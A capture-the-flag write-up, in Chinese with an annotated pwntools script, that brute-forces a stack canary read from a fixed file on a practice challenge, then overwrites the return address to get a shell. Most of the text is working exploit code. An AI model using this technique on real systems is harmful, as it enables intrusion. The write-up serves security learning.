用IDA分析一下程序,程序从一个固定文件里读取数据,作为canary的值。
由于文件内容不变,所以,我们可以直接爆破。
from pwn import *

# Writeup script (Python 2 / pwntools) for the challenge described above.
# Per the analysis on this page the target loads its canary from a fixed file,
# so every spawned instance of ./vuln carries the same canary value, and the
# program prints a distinct 'Canary Value Corrupt!' message when the check
# fails.  Together those two properties turn the canary check into a
# byte-at-a-time oracle, which is what the loop below exploits.
# From a defensive standpoint, either property alone breaks this approach:
# a fresh random canary per process makes guesses from one run useless in
# the next, and a failure path that does not reveal *why* it failed removes
# the oracle.

# NOTE(review): hard-coded SSH credentials for the challenge box; they are
# only acceptable here because this is throwaway CTF infrastructure.
shell = ssh(host='node3.buuoj.cn', user='CTFMan', port=27525, password='guest')
# Silence pwntools' per-process logging; the script prints its own progress.
context.log_level = 'critical'

# Recovered canary bytes, accumulated one byte per outer iteration (4 bytes
# total, matching the p32 layout used for the final payload).
canary = ''
for i in range(4):
    for c in range(0xFF):
        sh = shell.process('./vuln')
        sh.sendlineafter('>','-1')
        # 0x20 bytes of padding up to the canary slot (offset taken from the
        # author's analysis), then the bytes already recovered, then the
        # current guess for the next byte.
        payload = 'a'*0x20 + canary + p8(c)
        sh.sendafter('Input>',payload)
        # Discard one byte, then read the program's verdict.
        sh.recv(1)
        ans = sh.recv()
        if 'Canary Value Corrupt!' not in ans:
            # Guess accepted: record the byte and move on to the next index.
            print 'success guess the index({}),value({})'.format(i,c)
            canary += p8(c)
            break
        else:
            print 'try to guess the index({}) value'.format(i)
        # Only reached on a wrong guess; a successful guess breaks out above
        # and leaves that process handle to be cleaned up by pwntools.
        sh.close()
print 'canary=',canary

# Final payload: same padding and the recovered canary, four zero words
# (presumably saved registers / frame slots between the canary and the saved
# return address — layout inferred from the author's offsets, not verifiable
# here), then 0x080486EB, an address taken from the author's IDA analysis.
payload = 'a'*0x20 + canary + p32(0)*4 + p32(0x080486EB)
sh = shell.process('./vuln')
sh.sendlineafter('>','-1')
sh.sendafter('Input>',payload)
sh.interactive()